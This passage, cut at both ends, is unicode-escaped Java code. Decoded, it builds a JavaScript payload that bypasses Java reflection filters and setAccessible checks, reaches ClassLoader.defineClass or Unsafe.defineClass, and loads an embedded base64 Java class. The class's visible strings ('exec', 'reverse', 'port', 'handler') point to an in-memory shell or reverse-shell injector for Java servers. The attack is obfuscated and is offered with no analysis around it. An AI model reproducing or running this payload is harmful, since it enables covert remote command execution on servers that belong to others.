0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0069\u0066\u0020\u0028\u0076\u0065\u0072\u0073\u0069\u006f\u006e\u002e\u0073\u0070\u006c\u0069\u0074\u0028\u005c\u0022\u002e\u005c\u0022\u0029\u005b\u0030\u005d\u0020\u003e\u003d\u0020\u0031\u0031\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0020\u0020\u0062\u0079\u0070\u0061\u0073\u0073\u0052\u0065\u0066\u006c\u0065\u0063\u0074\u0069\u006f\u006e\u0046\u0069\u006c\u0074\u0065\u0072\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u004d\u0065\u0074\u0068\u006f\u0064\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u005c\u0022\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u005c\u0022\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u005c\u0022\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u005b\u0042\u005c\u0022\u0029\u002c\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u002e\u0054\u0059\u0050\u0045\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u002e\u0054\u0059\u0050\u0045\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u004d\u0065\u0074\u0068\u006f\u0064\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u002f\u002f\u0020\u7ed5\u8fc7\u0020\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0020\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0063\u006c\u007a\u0020\u003d\u0020\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u004d\u0065\u0074\u0068\u006f\u0064\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0063\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u002c\u0020\u0062\u0079\u0074\u0065\u0073\u002c\u0020\u0030\u002c\u0020\u0062\u0079\u0074\u0065\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u007d\u0065\u006c\u0073\u0065\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0020\u0020\u0076\u0061\u0072\u0020\u0070\u0072\u006f\u0074\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u006f\u006d\u0061\u0069\u006e\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0073\u0065\u0063\u0075\u0072\u0069\u0074\u0079\u002e\u0050\u0072\u006f\u0074\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u006f\u006d\u0061\u0069\u006e\u0028\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0073\u0065\u0063\u0075\u0072\u0069\u0074\u0079\u002e\u0043\u006f\u0064\u0065\u0053\u006f\u0075\u0072\u0063\u0065\u0028\u006e\u0075\u006c\u006c\u002c\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0041\u0072\u0072\u0061\u0079\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0073\u0065\u0063\u0075\u0072\u0069\u0074\u0079\u002e\u0063\u0065\u0072\u0074\u002e\u0043\u0065\u0072\u0074\u0069\u0066\u0069\u0063\u0061\u0074\u0065\u005c\u0022\u0029\u002c\u0020\u0030\u0029\u0029\u002c\u0020\u006e\u0075\u006c\u006c\u002c\u0020\u0063\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u002c\u0020\u005b\u005d\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0020\u0020\u0063\u006c\u007a\u0020\u003d\u0020\u0075\u006e\u0073\u0061\u0066\u0065\u002e\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u0028\u006e\u0075\u006c\u006c\u002c\u0020\u0062\u0079\u0074\u0065\u0073\u002c\u0020\u0030\u002c\u0020\u0062\u0079\u0074\u0065\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u002c\u0020\u0063\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u002c\u0020\u0070\u0072\u006f\u0074\u0065\u0063\u0074\u0069\u006f\u006e\u0044\u006f\u006d\u0061\u0069\u006e\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u0063\u0061\u0074\u0063\u0068\u0028\u0065\u0072\u0072\u006f\u0072\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0065\u0072\u0072\u006f\u0072\u002e\u0070\u0072\u0069\u006e\u0074\u0053\u0074\u0061\u0063\u006b\u0054\u0072\u0061\u0063\u0065\u0028\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u0066\u0069\u006e\u0061\u006c\u006c\u0079\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0063\u006c\u007a\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0066\u0075\u006e\u0063\u0074\u0069\u006f\u006e\u0020\u0062\u0061\u0073\u0065\u0036\u0034\u0044\u0065\u0063\u006f\u0064\u0065\u0054\u006f\u0042\u0079\u0074\u0065\u0028\u0073\u0074\u0072\u0029\u0020\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0076\u0061\u0072\u0020\u0062\u0074\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0074\u0072\u0079\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0062\u0074\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u0073\u0075\u006e\u002e\u006d\u0069\u0073\u0063\u002e\u0042\u0041\u0053\u0045\u0036\u0034\u0044\u0065\u0063\u006f\u0064\u0065\u0072\u005c\u0022\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u002e\u0064\u0065\u0063\u006f\u0064\u0065\u0042\u0075\u0066\u0066\u0065\u0072\u0028\u0073\u0074\u0072\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u0063\u0061\u0074\u0063\u0068\u0028\u0065\u0029\u007b\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0069\u0066\u0020\u0028\u0062\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0074\u0072\u0079\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0020\u0020\u0062\u0074\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0042\u0061\u0073\u0065\u0036\u0034\u005c\u0022\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006f\u0064\u0065\u0072\u0028\u0029\u002e\u0064\u0065\u0063\u006f\u0064\u0065\u0028\u0073\u0074\u0072\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u007d\u0063\u0061\u0074\u0063\u0068\u0028\u0065\u0029\u007b\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0069\u0066\u0028\u0062\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0074\u0072\u0079\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0020\u0020\u0062\u0074\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0042\u0061\u0073\u0065\u0036\u0034\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006f\u0064\u0065\u0072\u0028\u0029\u002e\u0064\u0065\u0063\u006f\u0064\u0065\u0028\u0073\u0074\u0072\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u007d\u0063\u0061\u0074\u0063\u0068\u0028\u0065\u0029\u007b\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0069\u0066\u0020\u0028\u0062\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u007b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0020\u0020\u0062\u0074\u0020\u003d\u0020\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u005c\u0022\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0063\u006f\u006d\u006d\u006f\u006e\u0073\u002e\u0063\u006f\u0064\u0065\u0063\u002e\u0062\u0069\u006e\u0061\u0072\u0079\u002e\u0042\u0061\u0073\u0065\u0036\u0034\u005c\u0022\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u002e\u0064\u0065\u0063\u006f\u0064\u0065\u0028\u0073\u0074\u0072\u0029\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0020\u0020\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0062\u0074\u003b\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u007d\u005c\u006e\u0022\u0020\u002b\u000a\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0022\u0076\u0061\u0072\u0020\u0063\u006f\u0064\u0065\u003d\u005c\u0022\u0079\u0076\u0036\u0036\u0076\u0067\u0041\u0041\u0041\u0044\u0045\u0042\u006a\u0077\u006f\u0041\u0048\u0067\u0043\u006e\u0043\u0067\u0042\u0044\u0041\u004b\u0067\u004b\u0041\u0045\u004d\u0041\u0071\u0051\u006f\u0041\u0048\u0067\u0043\u0071\u0043\u0041\u0043\u0072\u0043\u0067\u0041\u0063\u0041\u004b\u0077\u004b\u0041\u004b\u0030\u0041\u0072\u0067\u006f\u0041\u0072\u0051\u0043\u0076\u0042\u0077\u0043\u0077\u0043\u0067\u0042\u0044\u0041\u004c\u0045\u0049\u0041\u004a\u0038\u004b\u0041\u0043\u0045\u0041\u0073\u0067\u0067\u0041\u0073\u0077\u0067\u0041\u0074\u0041\u0063\u0041\u0074\u0051\u0067\u0041\u0074\u0067\u0067\u0041\u0074\u0077\u0063\u0041\u0075\u0041\u006f\u0041\u0048\u0041\u0043\u0035\u0043\u0041\u0043\u0036\u0043\u0041\u0043\u0037\u0042\u0077\u0043\u0038\u0043\u0077\u0041\u0057\u0041\u004c\u0030\u004c\u0041\u004c\u0034\u0041\u0076\u0077\u0073\u0041\u0076\u0067\u0044\u0041\u0043\u0041\u0044\u0042\u0043\u0041\u0044\u0043\u0042\u0077\u0044\u0044\u0043\u0067\u0041\u0063\u0041\u004d\u0051\u0048\u0041\u004d\u0055\u004b\u0041\u004d\u0059\u0041\u0078\u0077\u0067\u0041\u0079\u0041\u0063\u0041\u0079\u0051\u0067\u0041\u0079\u0067\u006f\u0041\u006a\u0041\u0044\u004c\u0043\u0067\u0041\u0068\u0041\u004d\u0077\u0049\u0041\u004d\u0030\u004a\u0041\u004d\u0034\u0041\u007a\u0077\u006f\u0041\u007a\u0067\u0044\u0051\u0043\u0041\u0044\u0052\u0043\u0067\u0043\u004d\u0041\u004e\u0049\u004b\u0041\u0042\u0077\u0041\u0030\u0077\u0067\u0041\u0031\u0041\u0063\u0041\u0031\u0051\u006f\u0041\u0048\u0041\u0044\u0057\u0043\u0041\u0044\u0058\u0042\u0077\u0044\u0059\u0043\u0041\u0044\u005a\u0043\u0041\u0044\u0061\u0043\u0067\u0041\u0063\u0041\u004e\u0073\u0048\u0041\u004e\u0077\u004b\u0041\u0045\u004d\u0041\u0033\u0051\u006f\u0041\u0033\u0067\u0044\u0053\u0043\u0041\u0044\u0066\u0043\u0067\u0041\u0068\u0041\u004f\u0041\u0049\u0041\u004f\u0045\u004b\u0041\u0043\u0045\u0041\u0034\u0067\u0067\u0041\u0034\u0077\u006f\u0041\u0049\u0051\u0044\u006b\u0043\u0067\u0043\u004d\u0041\u004f\u0055\u0049\u0041\u004f\u0059\u004b\u0041\u0043\u0045\u0041\u0035\u0077\u0067\u0041\u0036\u0041\u006b\u0041\u006a\u0041\u0044\u0070\u0043\u0067\u0044\u004f\u0041\u004f\u006f\u004a\u0041\u0049\u0077\u0041\u0036\u0077\u0063\u0041\u0037\u0041\u006f\u0041\u0051\u0077\u0044\u0074\u0043\u0067\u0042\u0044\u0041\u004f\u0034\u0049\u0041\u004b\u0041\u0049\u0041\u004f\u0038\u0049\u0041\u0050\u0041\u004b\u0041\u0049\u0077\u0041\u0038\u0051\u0067\u0041\u0038\u0067\u006f\u0041\u006a\u0041\u0044\u007a\u0042\u0077\u0044\u0030\u0043\u0067\u0042\u004d\u0041\u0050\u0055\u0048\u0041\u0050\u0059\u004b\u0041\u0045\u0034\u0041\u0039\u0077\u006f\u0041\u006a\u0041\u0044\u0034\u0043\u0067\u0042\u004f\u0041\u0050\u006b\u004b\u0041\u0045\u0034\u0041\u002b\u0067\u006f\u0041\u0054\u0067\u0044\u0037\u0043\u0067\u0041\u0076\u0041\u0050\u0077\u004b\u0041\u0045\u0077\u0041\u002f\u0051\u006f\u0041\u0049\u0051\u0044\u002b\u0043\u0041\u0044\u002f\u0043\u0067\u0045\u0041\u0041\u0051\u0045\u004b\u0041\u0043\u0045\u0042\u0041\u0067\u0067\u0042\u0041\u0077\u0067\u0042\u0042\u0041\u0067\u0042\u0042\u0051\u0063\u0042\u0042\u0067\u006f\u0041\u0058\u0051\u0043\u006e\u0043\u0067\u0042\u0064\u0041\u0051\u0063\u0049\u0041\u0051\u0067\u004b\u0041\u0046\u0030\u0041\u002f\u0041\u0067\u0042\u0043\u0051\u0067\u0042\u0043\u0067\u0067\u0042\u0043\u0077\u0067\u0042\u0044\u0041\u006f\u0042\u0044\u0051\u0045\u004f\u0043\u0067\u0045\u004e\u0041\u0051\u0038\u0048\u0041\u0052\u0041\u004b\u0041\u0052\u0045\u0042\u0045\u0067\u006f\u0041\u0061\u0041\u0045\u0054\u0043\u0041\u0045\u0055\u0043\u0067\u0042\u006f\u0041\u0052\u0055\u004b\u0041\u0047\u0067\u0041\u0076\u0077\u006f\u0041\u0061\u0041\u0045\u0057\u0043\u0067\u0045\u0052\u0041\u0052\u0063\u004b\u0041\u0052\u0045\u0042\u0047\u0041\u0067\u0042\u0047\u0051\u0067\u0042\u0047\u0067\u006f\u0042\u0044\u0051\u0045\u0062\u0042\u0077\u0045\u0063\u0043\u0067\u0042\u0030\u0041\u0052\u0030\u004b\u0041\u0048\u0051\u0042\u0045\u0067\u006f\u0042\u0045\u0051\u0045\u0065\u0043\u0067\u0042\u0030\u0041\u0052\u0034\u004b\u0041\u0048\u0051\u0042\u0048\u0077\u006f\u0042\u0049\u0041\u0045\u0068\u0043\u0067\u0045\u0067\u0041\u0053\u0049\u004b\u0041\u0053\u004d\u0042\u004a\u0041\u006f\u0042\u0049\u0077\u0044\u0036\u0042\u0051\u0041\u0041\u0041\u0041\u0041\u0041\u0041\u0041\u0041\u0079\u0043\u0067\u0042\u0044\u0041\u0053\u0055\u004b\u0041\u0052\u0045\u0042\u004a\u0067\u006f\u0041\u0064\u0041\u0044\u0037\u0043\u0067\u0041\u0076\u0041\u0053\u0063\u004b\u0041\u004d\u0034\u0042\u004b\u0041\u006f\u0041\u006a\u0041\u0045\u0070\u0043\u0041\u0045\u0071\u0043\u0041\u0045\u0072\u0043\u0041\u0045\u0073\u0043\u0041\u0045\u0074\u0043\u0041\u0043\u006a\u0043\u0041\u0045\u0075\u0042\u0077\u0045\u0076\u0041\u0051\u0041\u0043\u0061\u0058\u0041\u0042\u0041\u0042\u004a\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0042\u0041\u0041\u0052\u0077\u0062\u0033\u004a\u0030\u0041\u0051\u0041\u0054\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u004a\u0062\u006e\u0052\u006c\u005a\u0032\u0056\u0079\u004f\u0077\u0045\u0041\u0042\u006a\u0078\u0070\u0062\u006d\u006c\u0030\u0050\u0067\u0045\u0041\u0041\u0079\u0067\u0070\u0056\u0067\u0045\u0041\u0042\u0045\u004e\u0076\u005a\u0047\u0055\u0042\u0041\u0041\u0039\u004d\u0061\u0057\u0035\u006c\u0054\u006e\u0056\u0074\u0059\u006d\u0056\u0079\u0056\u0047\u0046\u0069\u0062\u0047\u0055\u0042\u0041\u0041\u0070\u0046\u0065\u0047\u004e\u006c\u0063\u0048\u0052\u0070\u0062\u0032\u0035\u007a\u0041\u0051\u0041\u004a\u0062\u0047\u0039\u0068\u005a\u0045\u004e\u0073\u0059\u0058\u004e\u007a\u0041\u0051\u0041\u006c\u004b\u0045\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0079\u006c\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0030\u004e\u0073\u0059\u0058\u004e\u007a\u004f\u0077\u0045\u0041\u0043\u0056\u004e\u0070\u005a\u0032\u0035\u0068\u0064\u0048\u0056\u0079\u005a\u0051\u0045\u0041\u004b\u0043\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0044\u0062\u0047\u0046\u007a\u0063\u007a\u0077\u0071\u0050\u006a\u0073\u0042\u0041\u0041\u0056\u0077\u0063\u006d\u0039\u0034\u0065\u0051\u0045\u0041\u004a\u0069\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0073\u0070\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u0041\u0051\u0041\u0046\u0064\u0033\u004a\u0070\u0064\u0047\u0055\u0042\u0041\u0044\u0067\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u004b\u0055\u0078\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u0033\u0052\u0079\u0061\u0057\u0035\u006e\u004f\u0077\u0045\u0041\u0043\u006d\u004e\u0073\u005a\u0057\u0046\u0079\u0055\u0047\u0046\u0079\u0059\u0057\u0030\u0042\u0041\u0041\u0052\u006c\u0065\u0047\u0056\u006a\u0041\u0051\u0041\u0048\u0063\u006d\u0056\u0032\u005a\u0058\u004a\u007a\u005a\u0051\u0045\u0041\u0046\u0069\u0068\u004d\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u0035\u006e\u004c\u0031\u004e\u0030\u0063\u006d\u006c\u0075\u005a\u007a\u0074\u004a\u004b\u0056\u0059\u0042\u0041\u0041\u004e\u0079\u0064\u0057\u0034\u0042\u0041\u0041\u005a\u006b\u005a\u0057\u004e\u0076\u005a\u0047\u0055\u0042\u0041\u0042\u0059\u006f\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0054\u0064\u0048\u004a\u0070\u0062\u006d\u0063\u0037\u004b\u0056\u0074\u0043\u0041\u0051\u0041\u004b\u0055\u0032\u0039\u0031\u0063\u006d\u004e\u006c\u0052\u006d\u006c\u0073\u005a\u0051\u0045\u0041\u0042\u0030\u0045\u0030\u004c\u006d\u0070\u0068\u0064\u006d\u0045\u004d\u0041\u004a\u0045\u0041\u006b\u0067\u0077\u0042\u004d\u0041\u0045\u0078\u0044\u0041\u0045\u0079\u0041\u0054\u004d\u004d\u0041\u0054\u0051\u0042\u004e\u0051\u0045\u0041\u0042\u0033\u0052\u006f\u0063\u006d\u0056\u0068\u005a\u0048\u004d\u004d\u0041\u0054\u0059\u0042\u004e\u0077\u0063\u0042\u004f\u0041\u0077\u0042\u004f\u0051\u0045\u0036\u0044\u0041\u0045\u0037\u0041\u0054\u0077\u0042\u0041\u0042\u004e\u0062\u0054\u0047\u0070\u0068\u0064\u006d\u0045\u0076\u0062\u0047\u0046\u0075\u005a\u0079\u0039\u0055\u0061\u0048\u004a\u006c\u0059\u0057\u0051\u0037\u0044\u0041\u0045\u0039\u0041\u0054\u0034\u004d\u0041\u0054\u0038\u0042\u0051\u0041\u0045\u0041\u0042\u0047\u0068\u0030\u0064\u0048\u0041\u0042\u0041\u0041\u005a\u0030\u0059\u0058\u004a\u006e\u005a\u0058\u0051\u0042\u0041\u0042\u004a\u0071\u0059\u0058\u005a\u0068\u004c\u0032\u0078\u0068\u0062\u006d\u0063\u0076\u0055\u006e\u0056\u0075\u0062\u006d\u0046\u0069\u0062\u0047\u0055\u0042\u0041\u0041\u005a\u0030\u0061\u0047\u006c\u007a\u004a\u0044\u0041\u0042\u0041\u0041\u0064\u006f\u0059\u0057\u0035\u006b\u0062\u0047\u0056\u0079\u0041\u0051\u0041\u0065\u0061\u006d\u0046\u0032\u0059\u0053\u0039\u0073\u0059\u0057\u